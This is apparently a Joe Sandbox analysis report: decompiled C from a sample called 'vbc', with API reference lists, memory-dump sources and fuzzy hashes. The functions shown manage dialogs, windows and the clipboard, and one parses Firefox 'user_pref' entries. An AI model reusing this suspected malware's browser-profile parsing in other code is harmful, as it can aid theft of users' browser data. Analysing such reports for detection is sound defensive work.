                                                              								if(( *(_t146 + 0x18) & 0x00000002) != 0) {
                                                              									goto L27;
                                                              								}
                                                              								__eflags =  *(_t146 + 0xc);
                                                              								E00401469(_t155, 0x3eb, 0 |  *(_t146 + 0xc) != 0x00000000);
                                                              								__eflags =  *(_t146 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 1;
                                                              								E00401469(_t155, 0x3ec, 0 |  *(_t146 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 0x00000001);
                                                              								 *((intOrPtr*)(_t155 + 0x14)) = 1;
                                                              								SetDlgItemInt( *(_t155 + 4), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) +  *(_t146 + 0x28) * 4), 0);
                                                              								 *((intOrPtr*)(_t155 + 0x14)) = 0;
                                                              								_t75 = 1;
                                                              								L28:
                                                              								return _t75;
                                                              							}
                                                              							L37:
                                                              							_t89 = E004048DC( *_t146,  *(_t146 + 0xc), 0xf002);
                                                              							__eflags = _t89 & 0x00000002;
                                                              							if((_t89 & 0x00000002) != 0) {
                                                              								_t90 = _t89 & 0x0000f000;
                                                              								__eflags = _t90 - 0x1000;
                                                              								_v8 = _t90;
                                                              								E00401469(_t155, 0x3ee, 0 | _t90 == 0x00001000);
                                                              								_v16 - 0x2000 = _v16 == 0x2000;
                                                              								E00401469(_t155, 0x3ef, 0 | _v16 == 0x00002000);
                                                              							}
                                                              							goto L39;
                                                              						}
                                                              						__eflags =  *(_t146 + 0x18) & 0x00000002;
                                                              						if(( *(_t146 + 0x18) & 0x00000002) == 0) {
                                                              							goto L37;
                                                              						}
                                                              						goto L36;
                                                              					}
                                                              				}
                                                              				_t98 = _t74 - 0xc2;
                                                              				if(_t98 == 0) {
                                                              					SendDlgItemMessageA( *(__ecx + 4), 0x3ed, 0xc5, 3, 0);
                                                              					E0040559F(_t155);
                                                              					goto L27;
                                                              				}
                                                              				_t101 = _t98 - 1;
                                                              				if(_t101 != 0) {
                                                              					goto L27;
                                                              				}
                                                              				_t126 = _a8 >> 0x10;
                                                              				if( *((intOrPtr*)(__ecx + 0x14)) != _t101 || _t126 != 0x300) {
                                                              					L7:
                                                              					if(_t126 != 0) {
                                                              						goto L27;
                                                              					}
                                                              					if(_a8 != 0x3f0) {
                                                              						L13:
                                                              						if(_a8 == 0x3eb) {
                                                              							E00404B35(GetDlgItem( *(_t155 + 4), 0x3e9), _t129);
                                                              						}
                                                              						if(_a8 == 0x3ec) {
                                                              							E00404B78(GetDlgItem( *(_t155 + 4), 0x3e9));
                                                              						}
                                                              						if(_a8 == 0x3ee) {
                                                              							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 1);
                                                              						}
                                                              						if(_a8 == 0x3ef) {
                                                              							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 0);
                                                              						}
                                                              						if(_a8 == 2) {
                                                              							EndDialog( *(_t155 + 4), 2);
                                                              						}
                                                              						if(_a8 == 1) {
                                                              							E00405538(_t155);
                                                              							EndDialog( *(_t155 + 4), 1);
                                                              						}
                                                              						_t75 = 1;
                                                              						goto L28;
                                                              					}
                                                              					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4));
                                                              					_t129 = 0;
                                                              					if(_t128 <= 0) {
                                                              						L12:
                                                              						E0040559F(_t155);
                                                              						goto L13;
                                                              					}
                                                              					_t144 = 0;
                                                              					do {
                                                              						_t118 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) + _t129 * 4;
                                                              						 *(_t118 + 2) = _t129;
                                                              						_t153 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x10)) + _t144 + 0xc));
                                                              						_t129 = _t129 + 1;
                                                              						_t144 = _t144 + 0x14;
                                                              						 *_t118 = _t153;
                                                              					} while (_t129 < _t128);
                                                              					goto L12;
                                                              				} else {
                                                              					if(_a8 != 0x3ed) {
                                                              						goto L27;
                                                              					} else {
                                                              						E004054C6(__ecx, __ecx);
                                                              						goto L7;
                                                              					}
                                                              				}
                                                              			}





















                                                              0x00405715
                                                              0x0040571b
                                                              0x0040571f
                                                              0x00405725
                                                              0x00405727
                                                              0x0040585b
                                                              0x0040585e
                                                              0x00405867
                                                              0x00405869
                                                              0x0040586c
                                                              0x00405873
                                                              0x00405879
                                                              0x0040586c
                                                              0x0040587a
                                                              0x0040587e
                                                              0x00405850
                                                              0x00405850
                                                              0x00405850
                                                              0x00000000
                                                              0x00405880
                                                              0x00405880
                                                              0x00405883
                                                              0x00000000
                                                              0x00000000
                                                              0x00405885
                                                              0x00405888
                                                              0x0040588f
                                                              0x00405897
                                                              0x0040589a
                                                              0x0040589c
                                                              0x0040589e
                                                              0x004058ed
                                                              0x004058ed
                                                              0x004058f1
                                                              0x00000000
                                                              0x00000000
                                                              0x004058f7
                                                              0x004058fb
                                                              0x00000000
                                                              0x00000000
                                                              0x00405905
                                                              0x00405913
                                                              0x00405921
                                                              0x0040592f
                                                              0x0040594d
                                                              0x00405950
                                                              0x00405956
                                                              0x00405959
                                                              0x00405852
                                                              0x00405858
                                                              0x00405858
                                                              0x004058a0
                                                              0x004058aa
                                                              0x004058b2
                                                              0x004058b4
                                                              0x004058b6
                                                              0x004058ba
                                                              0x004058c2
                                                              0x004058ce
                                                              0x004058dd
                                                              0x004058e8
                                                              0x004058e8
                                                              0x00000000
                                                              0x004058b4
                                                              0x00405891
                                                              0x00405895
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405895
                                                              0x0040587e
                                                              0x0040572d
                                                              0x00405732
                                                              0x00405844
                                                              0x0040584b
                                                              0x00000000
                                                              0x0040584b
                                                              0x00405738
                                                              0x00405739
                                                              0x00000000
                                                              0x00000000
                                                              0x00405742
                                                              0x00405748
                                                              0x00405762
                                                              0x00405765
                                                              0x00000000
                                                              0x00000000
                                                              0x00405771
                                                              0x004057a6
                                                              0x004057b7
                                                              0x004057bf
                                                              0x004057bf
                                                              0x004057ca
                                                              0x004057d2
                                                              0x004057d2
                                                              0x004057dd
                                                              0x004057e8
                                                              0x004057ee
                                                              0x004057f5
                                                              0x00405800
                                                              0x00405806
                                                              0x00405812
                                                              0x00405819
                                                              0x00405819
                                                              0x00405820
                                                              0x00405822
                                                              0x0040582c
                                                              0x0040582c
                                                              0x00405830
                                                              0x00000000
                                                              0x00405830
                                                              0x00405776
                                                              0x00405779
                                                              0x0040577d
                                                              0x004057a0
                                                              0x004057a1
                                                              0x00000000
                                                              0x004057a1
                                                              0x0040577f
                                                              0x00405781
                                                              0x00405786
                                                              0x00405789
                                                              0x00405790
                                                              0x00405795
                                                              0x00405796
                                                              0x0040579b
                                                              0x0040579b
                                                              0x00000000
                                                              0x00405751
                                                              0x00405757
                                                              0x00000000
                                                              0x0040575d
                                                              0x0040575d
                                                              0x00000000
                                                              0x0040575d
                                                              0x00405757

                                                              APIs
                                                              • GetDlgItem.USER32 ref: 004057BD
                                                              • GetDlgItem.USER32 ref: 004057D0
                                                              • GetDlgItem.USER32 ref: 004057E5
                                                              • GetDlgItem.USER32 ref: 004057FD
                                                              • EndDialog.USER32(?,00000002), ref: 00405819
                                                              • EndDialog.USER32(?,00000001), ref: 0040582C
                                                                • Part of subcall function 004054C6: GetDlgItem.USER32 ref: 004054D4
                                                                • Part of subcall function 004054C6: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 004054E9
                                                                • Part of subcall function 004054C6: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405505
                                                              • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405844
                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405950
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Item$DialogMessageSend
                                                              • String ID:
                                                              • API String ID: 2485852401-0
                                                              • Opcode ID: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                              • Instruction ID: 996ad43d7974a89766dbed28e3aed2d7518275209d6347d70af2c8e68d8db374
                                                              • Opcode Fuzzy Hash: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                              • Instruction Fuzzy Hash: 8361BE31600A05AFDB21AF25C986A2BB3A5EF40724F04C13EF915A76D1D778A960CF59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 85%
                                                              			E00405960(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
                                                              				RECT* _v8;
                                                              				void* __esi;
                                                              				void* _t39;
                                                              				signed int _t41;
                                                              				void* _t42;
                                                              				struct HWND__* _t47;
                                                              				signed int _t53;
                                                              				void* _t54;
                                                              				signed int _t76;
                                                              				signed int _t78;
                                                              				void* _t80;
                                                              				void** _t82;
                                                              				signed int _t86;
                                                              				void* _t90;
                                                              				signed int _t91;
                                                              
                                                              				_t80 = __edi;
                                                              				_push(_t58);
                                                              				_push(0xc);
                                                              				_v8 = 0;
                                                              				 *((intOrPtr*)(__edi + 0x10)) = __eax;
                                                              				L004115D0();
                                                              				if(__eax == 0) {
                                                              					_t82 = 0;
                                                              				} else {
                                                              					 *((intOrPtr*)(__eax)) = 0;
                                                              					_t82 = __eax;
                                                              				}
                                                              				 *(_t80 + 0xc) = _t82;
                                                              				_t39 =  *_t82;
                                                              				_t90 = _t39;
                                                              				if(_t90 != 0) {
                                                              					_push(_t39);
                                                              					L004115D6();
                                                              					 *_t82 = 0;
                                                              				}
                                                              				_t82[2] = _a8;
                                                              				_t41 = E004049FB(_a8);
                                                              				_t76 = 4;
                                                              				_t82[1] = _t41;
                                                              				_t42 = _t41 * _t76;
                                                              				_push( ~(0 | _t90 > 0x00000000) | _t42);
                                                              				L004115D0();
                                                              				 *_t82 = _t42;
                                                              				memset(_t42, 0, _t82[1] << 2);
                                                              				E00408441( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
                                                              				_t91 =  *(_t80 + 0x10);
                                                              				if(_t91 == 0) {
                                                              					_t86 = ( *(_t80 + 0xc))[1];
                                                              					_t78 = 0x14;
                                                              					_t53 = _t86 * _t78;
                                                              					_push( ~(0 | _t91 > 0x00000000) | _t53);
                                                              					L004115D0();
                                                              					 *(_t80 + 0x10) = _t53;
                                                              					if(_t86 > 0) {
                                                              						_t54 = 0;
                                                              						do {
                                                              							 *((intOrPtr*)(_t54 +  *(_t80 + 0x10) + 0xc)) = 0x78;
                                                              							_t54 = _t54 + 0x14;
                                                              							_t86 = _t86 - 1;
                                                              						} while (_t86 != 0);
                                                              					}
                                                              					_v8 = 1;
                                                              				}
                                                              				if(E00401540(0x448, _t80, _a4) == 1) {
                                                              					E004083B1( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
                                                              					InvalidateRect(( *(_t80 + 0xc))[2], 0, 0);
                                                              				}
                                                              				_t47 = SetFocus(_a8);
                                                              				if(_v8 != 0) {
                                                              					_push( *(_t80 + 0x10));
                                                              					L004115D6();
                                                              				}
                                                              				return _t47;
                                                              			}


















                                                              0x00405960
                                                              0x00405964
                                                              0x00405969
                                                              0x0040596b
                                                              0x0040596e
                                                              0x00405971
                                                              0x00405979
                                                              0x00405981
                                                              0x0040597b
                                                              0x0040597b
                                                              0x0040597d
                                                              0x0040597d
                                                              0x00405983
                                                              0x00405986
                                                              0x00405988
                                                              0x0040598a
                                                              0x0040598c
                                                              0x0040598d
                                                              0x00405993
                                                              0x00405993
                                                              0x00405999
                                                              0x0040599c
                                                              0x004059a6
                                                              0x004059a7
                                                              0x004059aa
                                                              0x004059b3
                                                              0x004059b4
                                                              0x004059c3
                                                              0x004059c5
                                                              0x004059d3
                                                              0x004059d8
                                                              0x004059db
                                                              0x004059e0
                                                              0x004059e7
                                                              0x004059ea
                                                              0x004059f3
                                                              0x004059f4
                                                              0x004059fc
                                                              0x004059ff
                                                              0x00405a01
                                                              0x00405a03
                                                              0x00405a06
                                                              0x00405a0e
                                                              0x00405a11
                                                              0x00405a11
                                                              0x00405a03
                                                              0x00405a14
                                                              0x00405a14
                                                              0x00405a2c
                                                              0x00405a34
                                                              0x00405a41
                                                              0x00405a41
                                                              0x00405a4a
                                                              0x00405a53
                                                              0x00405a55
                                                              0x00405a58
                                                              0x00405a5d
                                                              0x00405a61

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                              • String ID:
                                                              • API String ID: 2313361498-0
                                                              • Opcode ID: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                              • Instruction ID: c71b172428599a8aed3dd41af9edf36fe528ac6939486576e3287dd5c50b91d7
                                                              • Opcode Fuzzy Hash: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                              • Instruction Fuzzy Hash: 9931C6B2600605BFDB149F29D88591AF7A5FF44354B10863FF54AE72A0DB78EC408F98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040A698(void* __esi) {
                                                              				struct HDWP__* _v8;
                                                              				int _v12;
                                                              				intOrPtr _v16;
                                                              				struct tagRECT _v32;
                                                              				struct tagRECT _v48;
                                                              				void* _t32;
                                                              				int _t60;
                                                              				int _t65;
                                                              
                                                              				if( *((intOrPtr*)(__esi + 0x124)) != 0) {
                                                              					GetClientRect( *(__esi + 0x108),  &_v32);
                                                              					GetWindowRect( *(__esi + 0x114),  &_v48);
                                                              					_t65 = _v48.bottom - _v48.top + 1;
                                                              					GetWindowRect( *(__esi + 0x118),  &_v48);
                                                              					_v12 = _v32.right - _v32.left;
                                                              					_t60 = _v48.bottom - _v48.top + 1;
                                                              					_v16 = _v32.bottom - _v32.top;
                                                              					_v8 = BeginDeferWindowPos(3);
                                                              					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
                                                              					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
                                                              					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x370)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
                                                              					return EndDeferWindowPos(_v8);
                                                              				}
                                                              				return _t32;
                                                              			}











                                                              0x0040a6a5
                                                              0x0040a6b7
                                                              0x0040a6cd
                                                              0x0040a6df
                                                              0x0040a6e0
                                                              0x0040a6ee
                                                              0x0040a6f9
                                                              0x0040a6fa
                                                              0x0040a709
                                                              0x0040a71a
                                                              0x0040a73a
                                                              0x0040a761
                                                              0x00000000
                                                              0x0040a771
                                                              0x0040a773

                                                              APIs
                                                              • GetClientRect.USER32 ref: 0040A6B7
                                                              • GetWindowRect.USER32 ref: 0040A6CD
                                                              • GetWindowRect.USER32 ref: 0040A6E0
                                                              • BeginDeferWindowPos.USER32 ref: 0040A6FD
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A71A
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A73A
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A761
                                                              • EndDeferWindowPos.USER32(?), ref: 0040A76A
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$Defer$Rect$BeginClient
                                                              • String ID:
                                                              • API String ID: 2126104762-0
                                                              • Opcode ID: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                              • Instruction ID: 87e3885615821b4149b7d1c90d618f2f4546f2004ccbdac015d6c62594ca92fd
                                                              • Opcode Fuzzy Hash: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                              • Instruction Fuzzy Hash: 1E21A771A00209FFDB11CFA8DE89FEEBBB9FB08710F104465F655E2160C771AA519B24
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 91%
                                                              			E00406069(void* _a4) {
                                                              				signed int _t11;
                                                              				int _t13;
                                                              				void* _t17;
                                                              				signed int _t19;
                                                              				void* _t22;
                                                              
                                                              				_t22 = _a4;
                                                              				_t19 = 0;
                                                              				EmptyClipboard();
                                                              				if(_t22 != 0) {
                                                              					_t2 = strlen(_t22) + 1; // 0x1
                                                              					_t13 = _t2;
                                                              					_t17 = GlobalAlloc(0x2000, _t13);
                                                              					if(_t17 != 0) {
                                                              						memcpy(GlobalLock(_t17), _t22, _t13);
                                                              						GlobalUnlock(_t17);
                                                              						_t11 = SetClipboardData(1, _t17);
                                                              						asm("sbb esi, esi");
                                                              						_t19 =  ~( ~_t11);
                                                              					}
                                                              				}
                                                              				CloseClipboard();
                                                              				return _t19;
                                                              			}








                                                              0x0040606a
                                                              0x0040606f
                                                              0x00406071
                                                              0x00406079
                                                              0x00406084
                                                              0x00406084
                                                              0x00406093
                                                              0x00406097
                                                              0x004060a3
                                                              0x004060ac
                                                              0x004060b5
                                                              0x004060bf
                                                              0x004060c1
                                                              0x004060c1
                                                              0x004060c4
                                                              0x004060c5
                                                              0x004060cf

                                                              APIs
                                                              • EmptyClipboard.USER32(?,?,0040AEA7,?), ref: 00406071
                                                              • strlen.MSVCRT ref: 0040607E
                                                              • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AEA7,?), ref: 0040608D
                                                              • GlobalLock.KERNEL32 ref: 0040609A
                                                              • memcpy.MSVCRT ref: 004060A3
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004060AC
                                                              • SetClipboardData.USER32 ref: 004060B5
                                                              • CloseClipboard.USER32 ref: 004060C5
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                              • String ID:
                                                              • API String ID: 3116012682-0
                                                              • Opcode ID: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                              • Instruction ID: 7816216ade6a299d8ea944e6e9fe2aa84d769726faeb140b6a28ec5125b6acba
                                                              • Opcode Fuzzy Hash: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                              • Instruction Fuzzy Hash: 0DF0B4375402296BC3102BA0AD4CEDB7B6CEBC8B557028139FB0AD3151EA78592487B9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 80%
                                                              			E0040C530(void* __eflags, intOrPtr* _a4) {
                                                              				int _v8;
                                                              				char _v12;
                                                              				intOrPtr _v16;
                                                              				void _v1029;
                                                              				void _v1039;
                                                              				char _v1040;
                                                              				void _v2063;
                                                              				void _v2064;
                                                              				void _v3087;
                                                              				void _v3088;
                                                              				void* __ebx;
                                                              				intOrPtr _t53;
                                                              				void* _t54;
                                                              				void* _t56;
                                                              				void* _t59;
                                                              				void* _t60;
                                                              				void* _t67;
                                                              				void* _t68;
                                                              				void* _t73;
                                                              				void* _t85;
                                                              				int _t86;
                                                              				void* _t106;
                                                              				int _t107;
                                                              				int _t111;
                                                              				void* _t114;
                                                              				void* _t115;
                                                              				void* _t116;
                                                              
                                                              				_v1040 = 0;
                                                              				memset( &_v1039, 0, 0x3ff);
                                                              				_v3088 = 0;
                                                              				memset( &_v3087, 0, 0x3ff);
                                                              				_v2064 = 0;
                                                              				memset( &_v2063, 0, 0x3ff);
                                                              				_t116 = _t115 + 0x24;
                                                              				_t53 = E00406B74(_a4 + 4);
                                                              				_v12 = 0;
                                                              				_v16 = _t53;
                                                              				_t54 = E00406900(_t53,  &_v1040,  &_v1040,  &_v12);
                                                              				if(_t54 != 0) {
                                                              					do {
                                                              						_t56 = E004069D2(0, "user_pref(\"");
                                                              						_pop(_t92);
                                                              						if(_t56 != 0) {
                                                              							goto L10;
                                                              						}
                                                              						_push(0x412b10);
                                                              						_t60 = 0xb;
                                                              						_t14 = E004069D2(_t60) - 0xb; // -11
                                                              						_t92 = _t14;
                                                              						_v8 = _t92;
                                                              						if(_t92 <= 0) {
                                                              							goto L10;
                                                              						}
                                                              						_t85 = E004069D2(_t61 + 1, 0x412b18);
                                                              						_t17 = _t85 + 1; // 0x1
                                                              						_t106 = E004069D2(_t17, 0x412b10);
                                                              						if(_t106 <= 0) {
                                                              							_t28 = _t85 + 1; // 0x1
                                                              							_t67 = E004069D2(_t28, ")");
                                                              							_pop(_t92);
                                                              							_t68 = 0xfffffffe;
                                                              							_t111 = _t67 + _t68 - _t85;
                                                              							if(_t111 <= 0) {
                                                              								goto L10;
                                                              							}
                                                              							_t107 = _v8;
                                                              							memcpy( &_v3088,  &_v1029, _t107);
                                                              							 *((char*)(_t114 + _t107 - 0xc0c)) = 0;
                                                              							_t73 = _t114 + _t85 - 0x40a;
                                                              							L9:
                                                              							memcpy( &_v2064, _t73, _t111);
                                                              							_t92 = _a4;
                                                              							_t116 = _t116 + 0x18;
                                                              							 *((char*)(_t114 + _t111 - 0x80c)) = 0;
                                                              							_t59 =  *((intOrPtr*)( *_a4))( &_v3088,  &_v2064);
                                                              							if(_t59 == 0) {
                                                              								break;
                                                              							}
                                                              							goto L10;
                                                              						}
                                                              						_t20 = _t106 + 1; // 0x1
                                                              						_t111 = E004069D2(_t20, 0x412b10) - _t106 - 1;
                                                              						_pop(_t92);
                                                              						if(_t111 <= 0) {
                                                              							goto L10;
                                                              						}
                                                              						_t86 = _v8;
                                                              						memcpy( &_v3088,  &_v1029, _t86);
                                                              						 *((char*)(_t114 + _t86 - 0xc0c)) = 0;
                                                              						_t73 = _t114 + _t106 - 0x40b;
                                                              						goto L9;
                                                              						L10:
                                                              						_t59 = E00406900(_v16, _t92,  &_v1040,  &_v12);
                                                              					} while (_t59 != 0);
                                                              					return _t59;
                                                              				}
                                                              				return _t54;
                                                              			}






























                                                              0x0040c54b
                                                              0x0040c551
                                                              0x0040c55f
                                                              0x0040c565
                                                              0x0040c573
                                                              0x0040c579
                                                              0x0040c581
                                                              0x0040c587
                                                              0x0040c596
                                                              0x0040c59c
                                                              0x0040c59f
                                                              0x0040c5a8
                                                              0x0040c5af
                                                              0x0040c5bc
                                                              0x0040c5c3
                                                              0x0040c5c4
                                                              0x00000000
                                                              0x00000000
                                                              0x0040c5cf
                                                              0x0040c5d2
                                                              0x0040c5df
                                                              0x0040c5df
                                                              0x0040c5e4
                                                              0x0040c5e7
                                                              0x00000000
                                                              0x00000000
                                                              0x0040c5fe
                                                              0x0040c600
                                                              0x0040c610
                                                              0x0040c61b
                                                              0x0040c661
                                                              0x0040c664
                                                              0x0040c669
                                                              0x0040c66e
                                                              0x0040c671
                                                              0x0040c675
                                                              0x00000000
                                                              0x00000000
                                                              0x0040c677
                                                              0x0040c689
                                                              0x0040c68e
                                                              0x0040c696
                                                              0x0040c69d
                                                              0x0040c6a6
                                                              0x0040c6ab
                                                              0x0040c6b0
                                                              0x0040c6c1
                                                              0x0040c6c9
                                                              0x0040c6cd
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040c6cd
                                                              0x0040c61d
                                                              0x0040c62a
                                                              0x0040c62d
                                                              0x0040c62e
                                                              0x00000000
                                                              0x00000000
                                                              0x0040c634
                                                              0x0040c646
                                                              0x0040c64b
                                                              0x0040c653
                                                              0x00000000
                                                              0x0040c6cf
                                                              0x0040c6dd
                                                              0x0040c6e5
                                                              0x00000000
                                                              0x0040c6ec
                                                              0x0040c6f0

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpymemset$strlen$_memicmp
                                                              • String ID: user_pref("
                                                              • API String ID: 765841271-2487180061
                                                              • Opcode ID: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                              • Instruction ID: b5bbfaa39c0e48752cfa6ff41fc25d90fc637c7d31dd27b270ce5155e9a91379
                                                              • Opcode Fuzzy Hash: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                              • Instruction Fuzzy Hash: A74168B2904118AADB10DB95DCC0EDA77AD9F44314F1046BBE605F7181EA389F49CFA8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 61%
                                                              			E0040559F(intOrPtr _a4) {
                                                              				struct HWND__* _v12;
                                                              				signed int _v16;
                                                              				int _v20;
                                                              				int _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				int _v48;
                                                              				char* _v52;
                                                              				void* _v64;
                                                              				void _v319;
                                                              				char _v320;
                                                              				struct HWND__* _t53;
                                                              				intOrPtr* _t59;
                                                              				void* _t61;
                                                              				intOrPtr _t66;
                                                              				void* _t74;
                                                              				void* _t80;
                                                              				intOrPtr _t81;
                                                              				void* _t84;
                                                              				intOrPtr _t89;
                                                              				short _t91;
                                                              				signed int _t94;
                                                              				short* _t95;
                                                              				void* _t96;
                                                              				void* _t97;
                                                              
                                                              				_t89 = _a4;
                                                              				_t53 = GetDlgItem( *(_t89 + 4), 0x3e9);
                                                              				_v12 = _t53;
                                                              				SendMessageA(_t53, 0x1009, 0, 0);
                                                              				SendMessageA(_v12, 0x1036, 0, 0x26);
                                                              				do {
                                                              				} while (SendMessageA(_v12, 0x101c, 0, 0) != 0);
                                                              				_push(0xc8);
                                                              				_push(0);
                                                              				_push(0);
                                                              				_push(_v12);
                                                              				_t80 = 6;
                                                              				E00404925(0x412466, _t80);
                                                              				_t59 =  *((intOrPtr*)(_t89 + 0xc));
                                                              				_t81 =  *((intOrPtr*)(_t59 + 4));
                                                              				_t97 = _t96 + 0x10;
                                                              				_v32 = _t81;
                                                              				_v28 =  *_t59;
                                                              				_v20 = 0;
                                                              				if(_t81 <= 0) {
                                                              					L10:
                                                              					_t61 = 2;
                                                              					E004048B6(_t61, _v12, 0, _t61);
                                                              					return SetFocus(_v12);
                                                              				} else {
                                                              					goto L3;
                                                              				}
                                                              				do {
                                                              					L3:
                                                              					_v16 = 0;
                                                              					_v24 = 0;
                                                              					do {
                                                              						_t94 = _v16 << 2;
                                                              						if( *((short*)(_v28 + _t94 + 2)) == _v20) {
                                                              							_v320 = 0;
                                                              							memset( &_v319, 0, 0xff);
                                                              							_t97 = _t97 + 0xc;
                                                              							_v52 =  &_v320;
                                                              							_v64 = 4;
                                                              							_v48 = 0xff;
                                                              							if(SendMessageA( *( *((intOrPtr*)(_a4 + 0xc)) + 8), 0x1019, _v16,  &_v64) != 0) {
                                                              								_push(_v16);
                                                              								_push(0);
                                                              								_push(_v12);
                                                              								_t84 = 5;
                                                              								_t74 = E0040496E( &_v320, _t84);
                                                              								_t95 = _t94 + _v28;
                                                              								_t91 =  *_t95;
                                                              								E00404CE9(_v12, _t74, 0 | _t91 > 0x00000000);
                                                              								_t97 = _t97 + 0x18;
                                                              								if(_t91 == 0) {
                                                              									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + _v24 + 0xc));
                                                              								}
                                                              							}
                                                              						}
                                                              						_v16 = _v16 + 1;
                                                              						_t66 = _v32;
                                                              						_v24 = _v24 + 0x14;
                                                              					} while (_v16 < _t66);
                                                              					_v20 = _v20 + 1;
                                                              				} while (_v20 < _t66);
                                                              				goto L10;
                                                              			}




























                                                              0x004055ab
                                                              0x004055b6
                                                              0x004055cc
                                                              0x004055cf
                                                              0x004055dc
                                                              0x004055de
                                                              0x004055ea
                                                              0x004055ee
                                                              0x004055f3
                                                              0x004055f4
                                                              0x004055f5
                                                              0x004055ff
                                                              0x00405600
                                                              0x00405605
                                                              0x00405608
                                                              0x0040560d
                                                              0x00405612
                                                              0x00405615
                                                              0x00405618
                                                              0x0040561b
                                                              0x004056f5
                                                              0x004056f7
                                                              0x004056fd
                                                              0x00405712
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405621
                                                              0x00405621
                                                              0x00405621
                                                              0x00405624
                                                              0x00405627
                                                              0x0040562d
                                                              0x00405638
                                                              0x0040564c
                                                              0x00405652
                                                              0x00405660
                                                              0x00405669
